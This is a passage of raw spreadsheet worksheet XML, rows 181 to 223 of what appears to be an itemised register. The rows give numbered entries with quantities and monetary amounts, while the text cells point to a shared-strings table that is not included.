      <c r="L181" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="182" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A182" s="93"/>
      <c r="B182" s="88">
        <v>176</v>
      </c>
      <c r="C182" s="237" t="s">
        <v>3182</v>
      </c>
      <c r="D182" s="238" t="s">
        <v>3183</v>
      </c>
      <c r="E182" s="238" t="s">
        <v>3184</v>
      </c>
      <c r="F182" s="9"/>
      <c r="G182" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H182" s="11">
        <v>1</v>
      </c>
      <c r="I182" s="238" t="s">
        <v>339</v>
      </c>
      <c r="J182" s="126">
        <v>454000</v>
      </c>
      <c r="K182" s="99">
        <v>94432</v>
      </c>
      <c r="L182" s="10"/>
    </row>
    <row r="183" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A183" s="93"/>
      <c r="B183" s="88">
        <v>177</v>
      </c>
      <c r="C183" s="237" t="s">
        <v>3185</v>
      </c>
      <c r="D183" s="238" t="s">
        <v>2790</v>
      </c>
      <c r="E183" s="238" t="s">
        <v>3184</v>
      </c>
      <c r="F183" s="9"/>
      <c r="G183" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H183" s="11">
        <v>1</v>
      </c>
      <c r="I183" s="238" t="s">
        <v>339</v>
      </c>
      <c r="J183" s="126">
        <v>484000</v>
      </c>
      <c r="K183" s="99">
        <v>100672</v>
      </c>
      <c r="L183" s="10"/>
    </row>
    <row r="184" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A184" s="93"/>
      <c r="B184" s="88">
        <v>178</v>
      </c>
      <c r="C184" s="237" t="s">
        <v>3186</v>
      </c>
      <c r="D184" s="238" t="s">
        <v>3187</v>
      </c>
      <c r="E184" s="238" t="s">
        <v>3188</v>
      </c>
      <c r="F184" s="9"/>
      <c r="G184" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H184" s="11">
        <v>1</v>
      </c>
      <c r="I184" s="238" t="s">
        <v>1376</v>
      </c>
      <c r="J184" s="126">
        <v>592000</v>
      </c>
      <c r="K184" s="99">
        <v>123136</v>
      </c>
      <c r="L184" s="10"/>
    </row>
    <row r="185" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A185" s="93"/>
      <c r="B185" s="88">
        <v>179</v>
      </c>
      <c r="C185" s="237" t="s">
        <v>3189</v>
      </c>
      <c r="D185" s="238" t="s">
        <v>3190</v>
      </c>
      <c r="E185" s="238" t="s">
        <v>294</v>
      </c>
      <c r="F185" s="9"/>
      <c r="G185" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H185" s="11">
        <v>1</v>
      </c>
      <c r="I185" s="238" t="s">
        <v>1376</v>
      </c>
      <c r="J185" s="126">
        <v>65000</v>
      </c>
      <c r="K185" s="99">
        <v>13520</v>
      </c>
      <c r="L185" s="10"/>
    </row>
    <row r="186" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A186" s="93"/>
      <c r="B186" s="88">
        <v>180</v>
      </c>
      <c r="C186" s="237" t="s">
        <v>3191</v>
      </c>
      <c r="D186" s="238" t="s">
        <v>3192</v>
      </c>
      <c r="E186" s="238" t="s">
        <v>3193</v>
      </c>
      <c r="F186" s="9"/>
      <c r="G186" s="88" t="s">
        <v>592</v>
      </c>
      <c r="H186" s="11">
        <v>1</v>
      </c>
      <c r="I186" s="238" t="s">
        <v>3194</v>
      </c>
      <c r="J186" s="126">
        <v>228544.9</v>
      </c>
      <c r="K186" s="99">
        <v>56668</v>
      </c>
      <c r="L186" s="10"/>
    </row>
    <row r="187" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A187" s="93"/>
      <c r="B187" s="88">
        <v>181</v>
      </c>
      <c r="C187" s="237" t="s">
        <v>3195</v>
      </c>
      <c r="D187" s="238" t="s">
        <v>3196</v>
      </c>
      <c r="E187" s="238" t="s">
        <v>3197</v>
      </c>
      <c r="F187" s="9"/>
      <c r="G187" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H187" s="11">
        <v>1</v>
      </c>
      <c r="I187" s="238" t="s">
        <v>3198</v>
      </c>
      <c r="J187" s="126">
        <v>3850</v>
      </c>
      <c r="K187" s="99">
        <v>0</v>
      </c>
      <c r="L187" s="10"/>
    </row>
    <row r="188" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A188" s="93"/>
      <c r="B188" s="88">
        <v>182</v>
      </c>
      <c r="C188" s="237" t="s">
        <v>3199</v>
      </c>
      <c r="D188" s="238" t="s">
        <v>3200</v>
      </c>
      <c r="E188" s="238" t="s">
        <v>3201</v>
      </c>
      <c r="F188" s="9"/>
      <c r="G188" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H188" s="11">
        <v>8</v>
      </c>
      <c r="I188" s="238" t="s">
        <v>3202</v>
      </c>
      <c r="J188" s="126">
        <v>22400</v>
      </c>
      <c r="K188" s="99">
        <v>4659.2</v>
      </c>
      <c r="L188" s="10" t="s">
        <v>3203</v>
      </c>
    </row>
    <row r="189" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A189" s="93"/>
      <c r="B189" s="88">
        <v>183</v>
      </c>
      <c r="C189" s="237" t="s">
        <v>3204</v>
      </c>
      <c r="D189" s="238" t="s">
        <v>431</v>
      </c>
      <c r="E189" s="238" t="s">
        <v>3205</v>
      </c>
      <c r="F189" s="9"/>
      <c r="G189" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H189" s="11">
        <v>1</v>
      </c>
      <c r="I189" s="238" t="s">
        <v>467</v>
      </c>
      <c r="J189" s="126">
        <v>280000</v>
      </c>
      <c r="K189" s="99">
        <v>67200</v>
      </c>
      <c r="L189" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="190" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A190" s="93"/>
      <c r="B190" s="88">
        <v>184</v>
      </c>
      <c r="C190" s="237" t="s">
        <v>3206</v>
      </c>
      <c r="D190" s="238" t="s">
        <v>3207</v>
      </c>
      <c r="E190" s="238" t="s">
        <v>3208</v>
      </c>
      <c r="F190" s="9"/>
      <c r="G190" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H190" s="11">
        <v>1</v>
      </c>
      <c r="I190" s="238" t="s">
        <v>467</v>
      </c>
      <c r="J190" s="126">
        <v>37200</v>
      </c>
      <c r="K190" s="99">
        <v>0</v>
      </c>
      <c r="L190" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="191" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A191" s="93"/>
      <c r="B191" s="88">
        <v>185</v>
      </c>
      <c r="C191" s="237" t="s">
        <v>3209</v>
      </c>
      <c r="D191" s="238" t="s">
        <v>2865</v>
      </c>
      <c r="E191" s="238" t="s">
        <v>3059</v>
      </c>
      <c r="F191" s="9"/>
      <c r="G191" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H191" s="11">
        <v>1</v>
      </c>
      <c r="I191" s="238" t="s">
        <v>467</v>
      </c>
      <c r="J191" s="126">
        <v>11200</v>
      </c>
      <c r="K191" s="99">
        <v>0</v>
      </c>
      <c r="L191" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="192" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A192" s="93"/>
      <c r="B192" s="88">
        <v>186</v>
      </c>
      <c r="C192" s="237" t="s">
        <v>3210</v>
      </c>
      <c r="D192" s="238" t="s">
        <v>532</v>
      </c>
      <c r="E192" s="238" t="s">
        <v>3133</v>
      </c>
      <c r="F192" s="9"/>
      <c r="G192" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H192" s="11">
        <v>1</v>
      </c>
      <c r="I192" s="238" t="s">
        <v>467</v>
      </c>
      <c r="J192" s="126">
        <v>29300</v>
      </c>
      <c r="K192" s="99">
        <v>7032</v>
      </c>
      <c r="L192" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="193" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A193" s="93"/>
      <c r="B193" s="88">
        <v>187</v>
      </c>
      <c r="C193" s="237" t="s">
        <v>3211</v>
      </c>
      <c r="D193" s="238" t="s">
        <v>3212</v>
      </c>
      <c r="E193" s="238" t="s">
        <v>3213</v>
      </c>
      <c r="F193" s="9"/>
      <c r="G193" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H193" s="11">
        <v>2</v>
      </c>
      <c r="I193" s="238" t="s">
        <v>467</v>
      </c>
      <c r="J193" s="126">
        <v>132300</v>
      </c>
      <c r="K193" s="99">
        <v>31752</v>
      </c>
      <c r="L193" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="194" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A194" s="93"/>
      <c r="B194" s="88">
        <v>188</v>
      </c>
      <c r="C194" s="237" t="s">
        <v>3214</v>
      </c>
      <c r="D194" s="238" t="s">
        <v>3215</v>
      </c>
      <c r="E194" s="238" t="s">
        <v>3216</v>
      </c>
      <c r="F194" s="9"/>
      <c r="G194" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H194" s="11">
        <v>1</v>
      </c>
      <c r="I194" s="238" t="s">
        <v>894</v>
      </c>
      <c r="J194" s="126">
        <v>1100000</v>
      </c>
      <c r="K194" s="99">
        <v>264000</v>
      </c>
      <c r="L194" s="10"/>
    </row>
    <row r="195" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A195" s="93"/>
      <c r="B195" s="88">
        <v>189</v>
      </c>
      <c r="C195" s="237" t="s">
        <v>3217</v>
      </c>
      <c r="D195" s="238" t="s">
        <v>3218</v>
      </c>
      <c r="E195" s="238" t="s">
        <v>3153</v>
      </c>
      <c r="F195" s="9"/>
      <c r="G195" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H195" s="11">
        <v>1</v>
      </c>
      <c r="I195" s="238" t="s">
        <v>1125</v>
      </c>
      <c r="J195" s="126">
        <v>5039220.15</v>
      </c>
      <c r="K195" s="99">
        <v>1209408</v>
      </c>
      <c r="L195" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="196" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A196" s="93"/>
      <c r="B196" s="88">
        <v>190</v>
      </c>
      <c r="C196" s="237" t="s">
        <v>3219</v>
      </c>
      <c r="D196" s="238" t="s">
        <v>3220</v>
      </c>
      <c r="E196" s="238" t="s">
        <v>3221</v>
      </c>
      <c r="F196" s="9"/>
      <c r="G196" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H196" s="11">
        <v>1</v>
      </c>
      <c r="I196" s="238" t="s">
        <v>343</v>
      </c>
      <c r="J196" s="126">
        <v>199430</v>
      </c>
      <c r="K196" s="99">
        <v>47856</v>
      </c>
      <c r="L196" s="10"/>
    </row>
    <row r="197" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A197" s="93"/>
      <c r="B197" s="88">
        <v>191</v>
      </c>
      <c r="C197" s="237" t="s">
        <v>3222</v>
      </c>
      <c r="D197" s="238" t="s">
        <v>3223</v>
      </c>
      <c r="E197" s="238" t="s">
        <v>3224</v>
      </c>
      <c r="F197" s="9"/>
      <c r="G197" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H197" s="11">
        <v>1</v>
      </c>
      <c r="I197" s="238" t="s">
        <v>343</v>
      </c>
      <c r="J197" s="126">
        <v>76504</v>
      </c>
      <c r="K197" s="99">
        <v>21420</v>
      </c>
      <c r="L197" s="10"/>
    </row>
    <row r="198" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A198" s="93"/>
      <c r="B198" s="88">
        <v>192</v>
      </c>
      <c r="C198" s="237" t="s">
        <v>3225</v>
      </c>
      <c r="D198" s="238" t="s">
        <v>3223</v>
      </c>
      <c r="E198" s="238" t="s">
        <v>3226</v>
      </c>
      <c r="F198" s="9"/>
      <c r="G198" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H198" s="11">
        <v>1</v>
      </c>
      <c r="I198" s="238" t="s">
        <v>343</v>
      </c>
      <c r="J198" s="126">
        <v>105057</v>
      </c>
      <c r="K198" s="99">
        <v>29400</v>
      </c>
      <c r="L198" s="10"/>
    </row>
    <row r="199" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A199" s="93"/>
      <c r="B199" s="88">
        <v>193</v>
      </c>
      <c r="C199" s="237" t="s">
        <v>3227</v>
      </c>
      <c r="D199" s="238" t="s">
        <v>3228</v>
      </c>
      <c r="E199" s="238" t="s">
        <v>3229</v>
      </c>
      <c r="F199" s="9"/>
      <c r="G199" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H199" s="11">
        <v>1</v>
      </c>
      <c r="I199" s="238" t="s">
        <v>343</v>
      </c>
      <c r="J199" s="126">
        <v>200964</v>
      </c>
      <c r="K199" s="99">
        <v>48216</v>
      </c>
      <c r="L199" s="10"/>
    </row>
    <row r="200" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A200" s="93"/>
      <c r="B200" s="88">
        <v>194</v>
      </c>
      <c r="C200" s="237" t="s">
        <v>3230</v>
      </c>
      <c r="D200" s="238" t="s">
        <v>3228</v>
      </c>
      <c r="E200" s="238" t="s">
        <v>3231</v>
      </c>
      <c r="F200" s="9"/>
      <c r="G200" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H200" s="11">
        <v>1</v>
      </c>
      <c r="I200" s="238" t="s">
        <v>343</v>
      </c>
      <c r="J200" s="126">
        <v>320000</v>
      </c>
      <c r="K200" s="99">
        <v>76800</v>
      </c>
      <c r="L200" s="10"/>
    </row>
    <row r="201" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A201" s="93"/>
      <c r="B201" s="88">
        <v>195</v>
      </c>
      <c r="C201" s="237" t="s">
        <v>3232</v>
      </c>
      <c r="D201" s="238" t="s">
        <v>3233</v>
      </c>
      <c r="E201" s="238" t="s">
        <v>3234</v>
      </c>
      <c r="F201" s="9"/>
      <c r="G201" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H201" s="11">
        <v>1</v>
      </c>
      <c r="I201" s="238" t="s">
        <v>748</v>
      </c>
      <c r="J201" s="126">
        <v>315000</v>
      </c>
      <c r="K201" s="99">
        <v>88200</v>
      </c>
      <c r="L201" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="202" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A202" s="93"/>
      <c r="B202" s="88">
        <v>196</v>
      </c>
      <c r="C202" s="237" t="s">
        <v>3235</v>
      </c>
      <c r="D202" s="238" t="s">
        <v>3233</v>
      </c>
      <c r="E202" s="238" t="s">
        <v>3236</v>
      </c>
      <c r="F202" s="9"/>
      <c r="G202" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H202" s="11">
        <v>2</v>
      </c>
      <c r="I202" s="238" t="s">
        <v>748</v>
      </c>
      <c r="J202" s="126">
        <v>65000</v>
      </c>
      <c r="K202" s="99">
        <v>18200</v>
      </c>
      <c r="L202" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="203" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A203" s="93"/>
      <c r="B203" s="88">
        <v>197</v>
      </c>
      <c r="C203" s="237" t="s">
        <v>3237</v>
      </c>
      <c r="D203" s="238" t="s">
        <v>3238</v>
      </c>
      <c r="E203" s="238" t="s">
        <v>2743</v>
      </c>
      <c r="F203" s="9"/>
      <c r="G203" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H203" s="11">
        <v>1</v>
      </c>
      <c r="I203" s="238" t="s">
        <v>3239</v>
      </c>
      <c r="J203" s="126">
        <v>12000</v>
      </c>
      <c r="K203" s="99">
        <v>0</v>
      </c>
      <c r="L203" s="10"/>
    </row>
    <row r="204" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A204" s="93"/>
      <c r="B204" s="88">
        <v>198</v>
      </c>
      <c r="C204" s="237" t="s">
        <v>3240</v>
      </c>
      <c r="D204" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E204" s="238" t="s">
        <v>3241</v>
      </c>
      <c r="F204" s="9"/>
      <c r="G204" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H204" s="11">
        <v>1</v>
      </c>
      <c r="I204" s="238" t="s">
        <v>1171</v>
      </c>
      <c r="J204" s="126">
        <v>3100</v>
      </c>
      <c r="K204" s="99">
        <v>173.6</v>
      </c>
      <c r="L204" s="10"/>
    </row>
    <row r="205" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A205" s="93"/>
      <c r="B205" s="88">
        <v>199</v>
      </c>
      <c r="C205" s="237" t="s">
        <v>3242</v>
      </c>
      <c r="D205" s="238" t="s">
        <v>1343</v>
      </c>
      <c r="E205" s="238" t="s">
        <v>3243</v>
      </c>
      <c r="F205" s="9"/>
      <c r="G205" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H205" s="11">
        <v>1</v>
      </c>
      <c r="I205" s="238" t="s">
        <v>587</v>
      </c>
      <c r="J205" s="126">
        <v>118000</v>
      </c>
      <c r="K205" s="99">
        <v>35872</v>
      </c>
      <c r="L205" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="206" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A206" s="93"/>
      <c r="B206" s="88">
        <v>200</v>
      </c>
      <c r="C206" s="237" t="s">
        <v>3244</v>
      </c>
      <c r="D206" s="238" t="s">
        <v>3245</v>
      </c>
      <c r="E206" s="238" t="s">
        <v>3246</v>
      </c>
      <c r="F206" s="9"/>
      <c r="G206" s="88" t="s">
        <v>592</v>
      </c>
      <c r="H206" s="11">
        <v>1</v>
      </c>
      <c r="I206" s="238" t="s">
        <v>587</v>
      </c>
      <c r="J206" s="126">
        <v>415360</v>
      </c>
      <c r="K206" s="99">
        <v>23256.8</v>
      </c>
      <c r="L206" s="10"/>
    </row>
    <row r="207" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A207" s="93"/>
      <c r="B207" s="88">
        <v>201</v>
      </c>
      <c r="C207" s="237" t="s">
        <v>3247</v>
      </c>
      <c r="D207" s="238" t="s">
        <v>2798</v>
      </c>
      <c r="E207" s="238" t="s">
        <v>3248</v>
      </c>
      <c r="F207" s="9"/>
      <c r="G207" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H207" s="11">
        <v>3</v>
      </c>
      <c r="I207" s="238" t="s">
        <v>587</v>
      </c>
      <c r="J207" s="126">
        <v>2860000</v>
      </c>
      <c r="K207" s="99">
        <v>686400</v>
      </c>
      <c r="L207" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="208" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A208" s="93"/>
      <c r="B208" s="88">
        <v>202</v>
      </c>
      <c r="C208" s="237" t="s">
        <v>3249</v>
      </c>
      <c r="D208" s="238" t="s">
        <v>3250</v>
      </c>
      <c r="E208" s="238" t="s">
        <v>3251</v>
      </c>
      <c r="F208" s="9"/>
      <c r="G208" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H208" s="11">
        <v>1</v>
      </c>
      <c r="I208" s="238" t="s">
        <v>596</v>
      </c>
      <c r="J208" s="126">
        <v>4000</v>
      </c>
      <c r="K208" s="99">
        <v>448</v>
      </c>
      <c r="L208" s="10"/>
    </row>
    <row r="209" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A209" s="93"/>
      <c r="B209" s="88">
        <v>203</v>
      </c>
      <c r="C209" s="237" t="s">
        <v>3252</v>
      </c>
      <c r="D209" s="238" t="s">
        <v>3253</v>
      </c>
      <c r="E209" s="10"/>
      <c r="F209" s="9"/>
      <c r="G209" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H209" s="11">
        <v>2</v>
      </c>
      <c r="I209" s="238" t="s">
        <v>596</v>
      </c>
      <c r="J209" s="126">
        <v>19930</v>
      </c>
      <c r="K209" s="99">
        <v>5572</v>
      </c>
      <c r="L209" s="10"/>
    </row>
    <row r="210" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A210" s="93"/>
      <c r="B210" s="88">
        <v>204</v>
      </c>
      <c r="C210" s="237" t="s">
        <v>3254</v>
      </c>
      <c r="D210" s="238" t="s">
        <v>3255</v>
      </c>
      <c r="E210" s="238" t="s">
        <v>561</v>
      </c>
      <c r="F210" s="9"/>
      <c r="G210" s="88" t="s">
        <v>3256</v>
      </c>
      <c r="H210" s="11">
        <v>1</v>
      </c>
      <c r="I210" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J210" s="126">
        <v>4420931.62</v>
      </c>
      <c r="K210" s="99">
        <v>1237852</v>
      </c>
      <c r="L210" s="10"/>
    </row>
    <row r="211" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A211" s="93"/>
      <c r="B211" s="88">
        <v>205</v>
      </c>
      <c r="C211" s="237" t="s">
        <v>3257</v>
      </c>
      <c r="D211" s="238" t="s">
        <v>3258</v>
      </c>
      <c r="E211" s="238" t="s">
        <v>1560</v>
      </c>
      <c r="F211" s="9"/>
      <c r="G211" s="88" t="s">
        <v>3256</v>
      </c>
      <c r="H211" s="11">
        <v>1</v>
      </c>
      <c r="I211" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J211" s="126">
        <v>1186000</v>
      </c>
      <c r="K211" s="99">
        <v>332080</v>
      </c>
      <c r="L211" s="10"/>
    </row>
    <row r="212" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A212" s="93"/>
      <c r="B212" s="88">
        <v>206</v>
      </c>
      <c r="C212" s="237" t="s">
        <v>3259</v>
      </c>
      <c r="D212" s="238" t="s">
        <v>3260</v>
      </c>
      <c r="E212" s="238" t="s">
        <v>1560</v>
      </c>
      <c r="F212" s="9"/>
      <c r="G212" s="88" t="s">
        <v>3256</v>
      </c>
      <c r="H212" s="11">
        <v>1</v>
      </c>
      <c r="I212" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J212" s="126">
        <v>1186000</v>
      </c>
      <c r="K212" s="99">
        <v>332080</v>
      </c>
      <c r="L212" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="213" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A213" s="93"/>
      <c r="B213" s="88">
        <v>207</v>
      </c>
      <c r="C213" s="237" t="s">
        <v>3261</v>
      </c>
      <c r="D213" s="238" t="s">
        <v>3262</v>
      </c>
      <c r="E213" s="238" t="s">
        <v>1560</v>
      </c>
      <c r="F213" s="9"/>
      <c r="G213" s="88" t="s">
        <v>3256</v>
      </c>
      <c r="H213" s="11">
        <v>1</v>
      </c>
      <c r="I213" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J213" s="126">
        <v>1824000</v>
      </c>
      <c r="K213" s="99">
        <v>510720</v>
      </c>
      <c r="L213" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="214" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A214" s="93"/>
      <c r="B214" s="88">
        <v>208</v>
      </c>
      <c r="C214" s="237" t="s">
        <v>3263</v>
      </c>
      <c r="D214" s="238" t="s">
        <v>3264</v>
      </c>
      <c r="E214" s="238" t="s">
        <v>3265</v>
      </c>
      <c r="F214" s="9"/>
      <c r="G214" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H214" s="11">
        <v>1</v>
      </c>
      <c r="I214" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J214" s="126">
        <v>1395000</v>
      </c>
      <c r="K214" s="99">
        <v>390600</v>
      </c>
      <c r="L214" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="215" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A215" s="93"/>
      <c r="B215" s="88">
        <v>209</v>
      </c>
      <c r="C215" s="237" t="s">
        <v>3266</v>
      </c>
      <c r="D215" s="238" t="s">
        <v>3267</v>
      </c>
      <c r="E215" s="238" t="s">
        <v>282</v>
      </c>
      <c r="F215" s="9"/>
      <c r="G215" s="88" t="s">
        <v>3256</v>
      </c>
      <c r="H215" s="11">
        <v>1</v>
      </c>
      <c r="I215" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J215" s="126">
        <v>1350000</v>
      </c>
      <c r="K215" s="99">
        <v>378000</v>
      </c>
      <c r="L215" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="216" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A216" s="93"/>
      <c r="B216" s="88">
        <v>210</v>
      </c>
      <c r="C216" s="237" t="s">
        <v>3268</v>
      </c>
      <c r="D216" s="238" t="s">
        <v>3269</v>
      </c>
      <c r="E216" s="238" t="s">
        <v>555</v>
      </c>
      <c r="F216" s="9"/>
      <c r="G216" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H216" s="11">
        <v>2</v>
      </c>
      <c r="I216" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J216" s="126">
        <v>2135000</v>
      </c>
      <c r="K216" s="99">
        <v>597800</v>
      </c>
      <c r="L216" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="217" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A217" s="93"/>
      <c r="B217" s="88">
        <v>211</v>
      </c>
      <c r="C217" s="237" t="s">
        <v>3270</v>
      </c>
      <c r="D217" s="238" t="s">
        <v>3271</v>
      </c>
      <c r="E217" s="238" t="s">
        <v>3272</v>
      </c>
      <c r="F217" s="9"/>
      <c r="G217" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H217" s="11">
        <v>1</v>
      </c>
      <c r="I217" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J217" s="126">
        <v>2638504.27</v>
      </c>
      <c r="K217" s="99">
        <v>802104</v>
      </c>
      <c r="L217" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="218" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A218" s="93"/>
      <c r="B218" s="88">
        <v>212</v>
      </c>
      <c r="C218" s="237" t="s">
        <v>3273</v>
      </c>
      <c r="D218" s="238" t="s">
        <v>3274</v>
      </c>
      <c r="E218" s="238" t="s">
        <v>282</v>
      </c>
      <c r="F218" s="9"/>
      <c r="G218" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H218" s="11">
        <v>1</v>
      </c>
      <c r="I218" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J218" s="126">
        <v>758000</v>
      </c>
      <c r="K218" s="99">
        <v>212240</v>
      </c>
      <c r="L218" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="219" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A219" s="93"/>
      <c r="B219" s="88">
        <v>213</v>
      </c>
      <c r="C219" s="237" t="s">
        <v>3275</v>
      </c>
      <c r="D219" s="238" t="s">
        <v>3276</v>
      </c>
      <c r="E219" s="238" t="s">
        <v>3277</v>
      </c>
      <c r="F219" s="9"/>
      <c r="G219" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H219" s="11">
        <v>1</v>
      </c>
      <c r="I219" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J219" s="126">
        <v>674000</v>
      </c>
      <c r="K219" s="99">
        <v>188720</v>
      </c>
      <c r="L219" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="220" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A220" s="93"/>
      <c r="B220" s="88">
        <v>214</v>
      </c>
      <c r="C220" s="237" t="s">
        <v>3278</v>
      </c>
      <c r="D220" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E220" s="238" t="s">
        <v>3279</v>
      </c>
      <c r="F220" s="9"/>
      <c r="G220" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H220" s="11">
        <v>4</v>
      </c>
      <c r="I220" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J220" s="126">
        <v>122000</v>
      </c>
      <c r="K220" s="99">
        <v>13664</v>
      </c>
      <c r="L220" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="221" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A221" s="93"/>
      <c r="B221" s="88">
        <v>215</v>
      </c>
      <c r="C221" s="237" t="s">
        <v>3280</v>
      </c>
      <c r="D221" s="238" t="s">
        <v>3281</v>
      </c>
      <c r="E221" s="238" t="s">
        <v>3282</v>
      </c>
      <c r="F221" s="9"/>
      <c r="G221" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H221" s="11">
        <v>1</v>
      </c>
      <c r="I221" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J221" s="126">
        <v>8190</v>
      </c>
      <c r="K221" s="99">
        <v>2293.2</v>
      </c>
      <c r="L221" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="222" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A222" s="93"/>
      <c r="B222" s="88">
        <v>216</v>
      </c>
      <c r="C222" s="237" t="s">
        <v>3283</v>
      </c>
      <c r="D222" s="238" t="s">
        <v>3284</v>
      </c>
      <c r="E222" s="238" t="s">
        <v>3120</v>
      </c>
      <c r="F222" s="9"/>
      <c r="G222" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H222" s="11">
        <v>1</v>
      </c>
      <c r="I222" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J222" s="126">
        <v>7985</v>
      </c>
      <c r="K222" s="99">
        <v>2234.4</v>
      </c>
      <c r="L222" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="223" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A223" s="93"/>
      <c r="B223" s="88">
        <v>217</v>
      </c>
      <c r="C223" s="237" t="s">
        <v>3285</v>
      </c>
      <c r="D223" s="238" t="s">
        <v>3286</v>
      </c>
      <c r="E223" s="238" t="s">
        <v>3287</v>
      </c>
      <c r="F223" s="9"/>
